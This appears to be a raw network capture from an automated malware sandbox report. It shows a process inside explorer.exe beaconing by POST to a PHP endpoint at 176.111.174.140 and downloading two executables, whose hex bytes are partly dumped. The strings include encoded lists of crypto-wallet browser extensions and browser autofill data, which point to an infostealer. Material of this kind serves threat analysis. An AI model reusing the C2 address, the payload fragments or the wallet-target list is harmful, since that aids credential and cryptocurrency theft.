                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620265007 CET1236INData Raw: a8 aa 21 5a 2f 6a df b8 e2 21 c6 8e fa e2 21 de 8e f2 99 6a e2 29 6e ea f1 69 55 6a e2 23 d6 8e ca e2 c9 62 42 36 33 ab aa e2 21 52 e2 2f 6a de 80 e2 23 c6 8e 92 e2 23 c6 8e 9a eb 29 63 55 e6 21 69 99 78 13 43 57 aa aa 23 de 8e 82 e2 23 ee 8e 8a
                                                                                                                                                                                                                                                  Data Ascii: !Z/j!!j)niUj#bB63!R/j##)cU!ixCW##Ukm!m!!!)nifffffffff)Fj!s/c.#!k#)cUCWx##Um!Z/jj!)niUj#bcB[2!R/j!!)ni)cU!i
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620279074 CET776INData Raw: e2 21 65 e6 21 6a e2 21 f6 8e 9a e2 29 6e 8a f5 43 aa aa aa aa e2 23 f6 8e a2 fd e2 29 46 8a e2 21 53 e3 21 62 e2 21 70 42 e2 da aa aa e2 21 79 e2 21 65 e6 21 6a e2 21 f6 8e 9a e2 29 6e 8a f5 43 6a a7 aa aa e2 23 f6 8e ba fd e2 29 46 8a e2 21 70
                                                                                                                                                                                                                                                  Data Ascii: !e!j!)nC#)F!S!b!pB!y!e!j!)nCj#)F!p!S'!aBNUU!e!zBbHUUjx!eB1YUU!aBY!e!zB2!!m)niffffffffff#)F!p!S'!aBIIUU'!bB|IUU!e!zBHUUjx!eBYUU)cUj!y!
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620290995 CET1236INData Raw: aa 2f 6a de 82 a5 b5 2e aa aa aa aa aa e2 27 fe 8e ea e2 27 e6 8e 8a 42 eb a6 aa aa e2 27 fe 8e ea e2 21 65 42 d6 d0 ab aa 2f 6a df 4a e2 27 fe 8e 8a e2 21 61 42 f9 8e ab aa e2 27 e6 8e 8a 42 63 57 55 55 e2 21 69 e2 21 26 8e da ab aa aa e2 99 66
                                                                                                                                                                                                                                                  Data Ascii: /j.''B'!eB/jJ'!aB'BcWUU!i!&fB<0!62+n*ifffff+F"!=n#!S'!Z!HB@TUU'!|BGVUU'!zBZ!d!zBWUU'B!JUUj'!ZB!B/j.f#r
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.739995003 CET1236INData Raw: e2 21 62 42 0b a4 aa aa e2 2f 6a df af eb 21 74 41 a6 29 60 55 e2 21 62 55 bf 11 10 a8 aa e2 21 65 55 bf 38 10 a8 aa 21 69 e2 21 e6 8e e2 e2 99 66 42 49 3f ab aa e2 29 6e fa eb f4 f5 f4 f7 f1 69 66 66 66 66 66 66 66 66 e2 23 f6 8e ba fd e2 29 46
                                                                                                                                                                                                                                                  Data Ascii: !bB/j!tA)`U!bU!eU8!i!fBI?)niffffffff#)F)!p!S!UjBXUUA'BvUU!i!}!bBpUUm!jx#!!a#!)nC/AUUfffff##")FS!Z!p)RBAUU''BcGUU!


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.449734176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.638899088 CET260OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.960546970 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:24 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 40
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 62 30 37 33 36 61 61 39 36 34 30 30 39 30 65 30 38 66 34 38 38 61 66 62 32 66 31 64 32 30 34 36 30 61 34 36 37 66 65 31
                                                                                                                                                                                                                                                  Data Ascii: b0736aa9640090e08f488afb2f1d20460a467fe1


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.449735176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.082915068 CET280OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 32
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.202950954 CET32OUTData Raw: 00 5f 43 4f 07 51 1d 09 4a 04 4c 00 45 7a 2a 7e 7d 35 19 68 7b 1d 0c 0d 5c 03 42 18 03 4c 19 07
                                                                                                                                                                                                                                                  Data Ascii: _COQJLEz*~}5h{\BL
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.792840958 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:25 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.449736176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.932009935 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:27.053642988 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.523123026 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:27 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 65
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 52 4c 5f 47 42 11 5b 16 19 05 07 06 17 01 54 01 16 57 03 0c 16 50 52 52 1d 1e 1f 01 4a 55 39 3c 00 1d 5c 42 43 16 5f 1e 4d 01 00 05 18 50 50 08 18 05 07 04 17 01 51 00 17 1c 4c 16 5d 19 03 6f 38
                                                                                                                                                                                                                                                  Data Ascii: RL_GB[TWPRRJU9<\BC_MPPQL]o8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.449737176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.647669077 CET232OUTGET /x.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999641895 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:29 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  Last-Modified: Fri, 18 Oct 2024 19:00:38 GMT
                                                                                                                                                                                                                                                  ETag: "4b200-624c4eb378792"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 307712
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 9e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @LO H.text `.rsrc @@.reloc@BH ,(wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999684095 CET224INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                                                                                                  Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999694109 CET1236INData Raw: 39 00 6d 00 59 00 6d 00 52 00 6b 00 5a 00 32 00 4e 00 70 00 61 00 6d 00 35 00 74 00 61 00 47 00 35 00 6d 00 62 00 6d 00 74 00 6b 00 62 00 6d 00 46 00 68 00 5a 00 48 00 78 00 44 00 62 00 32 00 6c 00 75 00 59 00 6d 00 46 00 7a 00 5a 00 51 00 70 00
                                                                                                                                                                                                                                                  Data Ascii: 9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWht
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999726057 CET1236INData Raw: 66 00 45 00 31 00 6c 00 64 00 30 00 4e 00 34 00 43 00 6d 00 35 00 68 00 62 00 6d 00 70 00 74 00 5a 00 47 00 74 00 75 00 61 00 47 00 74 00 70 00 62 00 6d 00 6c 00 6d 00 62 00 6d 00 74 00 6e 00 5a 00 47 00 4e 00 6e 00 5a 00 32 00 4e 00 6d 00 62 00
                                                                                                                                                                                                                                                  Data Ascii: fE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybl
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999799013 CET1236INData Raw: 65 00 6e 00 74 00 56 00 65 00 72 00 73 00 53 00 6b 00 79 00 42 00 6f 00 78 00 69 00 6f 00 6e 00 f4 a7 50 51 41 65 53 7e 17 a4 c3 1a 27 5e 96 3a ab 6b cb 3b 9d 45 f1 1f fa 58 ab ac e3 03 93 4b 30 fa 55 20 76 6d f6 ad cc 76 91 88 02 4c 25 f5 e5 d7
                                                                                                                                                                                                                                                  Data Ascii: entVersSkyBoxionPQAeS~'^:k;EXK0U vmvL%O*5D&bZIg%E]/uLFk_mzRY-t!Xi)IDjuyxX>kq'O f:}Jc1Q3`SEbdwk+HhXpEl{Rs#
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999810934 CET1236INData Raw: 01 13 8a 6b 3a 91 11 41 4f 67 dc ea 97 f2 cf ce f0 b4 e6 73 96 ac 74 22 e7 ad 35 85 e2 f9 37 e8 1c 75 df 6e 47 f1 1a 71 1d 29 c5 89 6f b7 62 0e aa 18 be 1b fc 56 3e 4b c6 d2 79 20 9a db c0 fe 78 cd 5a f4 1f dd a8 33 88 07 c7 31 b1 12 10 59 27 80
                                                                                                                                                                                                                                                  Data Ascii: k:AOgst"57unGq)obV>Ky xZ31Y'_`QJ-z;M*<Sa+~w&icU!}SELProcessInfoECT * FRProcessInfoOM Win32_PrProcessInfoo
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999823093 CET1236INData Raw: 89 07 8e 8e a7 33 94 94 b6 2d 9b 9b 22 3c 1e 1e 92 15 87 87 20 c9 e9 e9 49 87 ce ce ff aa 55 55 78 50 28 28 7a a5 df df 8f 03 8c 8c f8 59 a1 a1 80 09 89 89 17 1a 0d 0d da 65 bf bf 31 d7 e6 e6 c6 84 42 42 b8 d0 68 68 c3 82 41 41 b0 29 99 99 77 5a
                                                                                                                                                                                                                                                  Data Ascii: 3-"< IUUxP((zYe1BBhhAA)wZ--{TTm:,AppData\Local\[^\u0020-\u007F]UNKNOWNLocal StateQP~AeS:'^;kEXK 0
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000000000 CET1236INData Raw: 6f 00 6c 00 75 00 74 00 69 00 6f 00 6e 00 43 00 20 00 00 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 64 00 00 00 00 00 00 00 31 00 2a 00 2e 00 31 00 6c 00 31 00 64 00 31 00 62 00 00 00 00 00 00 00 63 a5 c6 63 7c 84 f8 7c 77 99 ee 77 7b 8d
                                                                                                                                                                                                                                                  Data Ascii: olutionC ProcessId1*.1l1d1bcc||ww{{kkooT0P`0gg+}V+bMvvE@}}YYGGAg_E#Srr[u=&jL&6Zl6?A~?O4\h4Q4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000011921 CET1236INData Raw: 56 00 30 00 43 00 6d 00 46 00 70 00 61 00 57 00 5a 00 69 00 62 00 6d 00 4a 00 6d 00 62 00 32 00 4a 00 77 00 62 00 57 00 56 00 6c 00 61 00 32 00 6c 00 77 00 61 00 47 00 56 00 6c 00 61 00 57 00 70 00 70 00 62 00 57 00 52 00 77 00 62 00 6d 00 78 00
                                                                                                                                                                                                                                                  Data Ascii: V0CmFpaWZibmJmb2JwbWVla2lwaGVlaWppbWRwbmxwZ3BwfFRlcnJhU3RhdGlvbgpmbm5lZ3BobG9iamRwa2hlY2Fwa2lqamRrZ2NqaGtpYnxIYXJtb255V2Fs
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000026941 CET1236INData Raw: 59 00 57 00 64 00 74 00 5a 00 6e 00 42 00 6d 00 59 00 6d 00 39 00 70 00 5a 00 57 00 46 00 6d 00 66 00 46 00 68 00 6b 00 5a 00 57 00 5a 00 70 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 78 00 77 00 5a 00 6d 00 4e 00 69 00 61 00
                                                                                                                                                                                                                                                  Data Ascii: YWdtZnBmYm9pZWFmfFhkZWZpV2FsbGV0CmxwZmNiamtuaWpwZWVpbGxpZm5raWtnbmNpa2dmaGRvfE5hbWlXYWxsZXQKZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.124243975 CET1236INData Raw: 61 00 32 00 6c 00 72 00 5a 00 32 00 35 00 6a 00 61 00 57 00 74 00 6e 00 5a 00 6d 00 68 00 6b 00 62 00 33 00 78 00 4f 00 59 00 57 00 31 00 70 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 52 00 75 00 5a 00 32 00 31 00 73 00 59 00
                                                                                                                                                                                                                                                  Data Ascii: a2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ram


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.449738176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:31.226923943 CET233OUTGET /zx.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571054935 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:31 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 15:52:16 GMT
                                                                                                                                                                                                                                                  ETag: "5a4530-628376a94bc71"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 5915952
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 30 86 4c 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7d 1a [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd0Lg"(X@}[`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571083069 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.LHuHVHM
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571094990 CET1236INData Raw: 48 83 c4 20 41 5f 41 5e 5e c3 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 53 e5 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 00 a4 02 00 48 8d 0d 35 a4 02 00 e8 a4 12 00 00 e9 bb 00 00 00 8b 4e 0c e8 a7 2c 01 00 4c 8b f0 48 85 c0 75 20 44 8b 4e
                                                                                                                                                                                                                                                  Data Ascii: H A_A^^VE3HISyLFHH5N,LHu DNLFH H-t~uME3HIc^Hl$@IH|$HLd$PHt8A fDI;HMAIGHHnHrBHH+u3H|$HHl$@Ld$PtI
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571139097 CET1236INData Raw: 0c 48 89 b4 24 a8 00 00 00 88 84 24 83 00 00 00 e8 35 5d 00 00 48 8b f0 48 85 c0 0f 84 37 02 00 00 45 33 c0 48 8b d0 48 8b cf e8 6f e0 00 00 85 c0 79 18 48 8d 15 20 a0 02 00 48 8d 0d 55 9f 02 00 e8 c4 0d 00 00 e9 0d 02 00 00 4c 8b cf 48 8d 4c 24
                                                                                                                                                                                                                                                  Data Ascii: H$$5]HH7E3HHoyH HULHL$ XAHsHH_`n'HHuHH(_LLHD$(H D$(LL$8D$,LD$,@
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571192026 CET1236INData Raw: c0 48 89 44 24 50 b9 00 02 00 00 48 8b 47 08 48 89 6c 24 48 48 89 44 24 40 c7 44 24 38 00 00 00 80 c7 44 24 30 00 00 00 80 c7 44 24 28 00 00 00 80 c7 44 24 20 00 00 00 80 ff 15 47 95 02 00 48 89 6c 24 58 4c 8d 05 cb 9c 02 00 48 89 87 38 20 00 00
                                                                                                                                                                                                                                                  Data Ascii: HD$PHGHl$HHD$@D$8D$0D$(D$ GHl$XLH8 HHAPHD$P3HGHD$HHD$@D$8D$0D$(D$ LP E3HOH@ ULP HOA9LP H( rA
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571207047 CET1236INData Raw: cc cc 40 55 53 56 57 41 56 48 8d ac 24 30 df ff ff b8 d0 21 00 00 e8 57 98 00 00 48 2b e0 48 8b 05 1d bd 03 00 48 33 c4 48 89 85 c0 20 00 00 48 8b d9 4d 8b f0 33 c9 48 8b f2 ff 15 62 8d 02 00 33 d2 48 8d 8d b6 1f 00 00 41 b8 02 01 00 00 48 8b f8
                                                                                                                                                                                                                                                  Data Ascii: @USVWAVH$0!WH+HH3H HM3Hb3HAHt3HLf@H3HL$X3HD$8A@ ,tHH|$0HHHD$@HIHD$HHHD$PLIHD$0E3H
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571218967 CET1236INData Raw: 02 e8 cc 14 01 00 8b cb e8 a1 1c 01 00 48 89 44 24 28 4c 8d 8c 24 30 04 00 00 4c 8d 05 6d 94 02 00 48 89 7c 24 20 ba 00 04 00 00 48 8d 4c 24 30 e8 e9 f3 ff ff 41 b8 00 04 00 00 48 8d 94 24 30 08 00 00 48 8d 4c 24 30 e8 91 5e 00 00 33 c9 41 b9 30
                                                                                                                                                                                                                                                  Data Ascii: HD$(L$0LmH|$ HL$0AH$0HL$0^3A0HtLH$0LHT$0{H$0H3H@_^[LIKISMCMK SWHHHH3H$0HI{H|$(HT$0LHD$ A
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571392059 CET1236INData Raw: 10 04 00 48 8b cd ff 15 ae 87 02 00 48 8b 6c 24 60 48 8b 05 aa 10 04 00 49 8b cc ff 15 99 87 02 00 4c 8b 64 24 68 48 8b 05 95 10 04 00 49 8b cd ff 15 84 87 02 00 48 8b 5c 24 70 49 8b c6 48 83 c4 30 41 5f 41 5e 41 5d 5f 5e c3 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                  Data Ascii: HHl$`HILd$hHIH\$pIH0A_A^A]_^@VAUAWp`H+H&H3H$PH LHHkLHuHfHIL$hLHuHPckH
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571403980 CET1236INData Raw: 17 80 f9 64 0f 84 02 01 00 00 80 f9 6e 74 09 80 f9 78 0f 85 3a 01 00 00 48 8d 77 12 85 db 0f 85 83 01 00 00 48 8b 8d 18 20 00 00 48 85 c9 74 08 48 8b d6 e8 1e 3c 00 00 48 89 74 24 28 4c 8d 8d 22 20 00 00 4c 8d 05 c3 8a 02 00 c7 44 24 20 5c 00 00
                                                                                                                                                                                                                                                  Data Ascii: dntx:HwH HtH<Ht$(L" LD$ \H$=(H$u>H HtH6H$D810H6LH" HBduYH$HL$
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.571414948 CET1236INData Raw: 82 74 ff ff ff 48 8d 0d 86 88 02 00 e8 b1 47 00 00 4c 8b bc 24 a8 20 00 00 4c 8b c0 48 85 c0 74 26 0f b6 10 83 ea 30 75 0b 0f b6 50 01 33 c0 0f b6 c8 2b d1 85 d2 49 8b c8 0f 95 c0 88 87 31 30 00 00 e8 c7 0a 01 00 80 bf 20 20 00 00 00 0f 84 a2 01
                                                                                                                                                                                                                                                  Data Ascii: tHGL$ LHt&0uP3+I10 HWbGHKHHHI;@H" ! LLE=HH$ H$ H$` H3FHp A^_^H7HO
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:32.692100048 CET1236INData Raw: 30 5f 5e 5b c3 48 8b cf e8 e1 03 00 00 48 83 c4 30 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 56 b8 60 40 00 00 e8 1f 80 00 00 48 2b e0 48 8b 05 e5 a4 03 00 48 33 c4 48 89 84 24 50 40 00 00 4c 8b b4 24 b0 40 00 00 48 8b f2 48 8d 51
                                                                                                                                                                                                                                                  Data Ascii: 0_^[HH0_^[@SUVWAV`@H+HH3H$P@L$@HHQHH$PIIHH$P0HH0L$PH$P A\Ht/Hl$@HDL$8HD$0H$P0DL$(HD$ &Hl$0H$P0D$(\HhHD$


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.449744176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:42.518403053 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:42.638619900 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:44.148679972 CET216INHTTP/1.1 200 OK
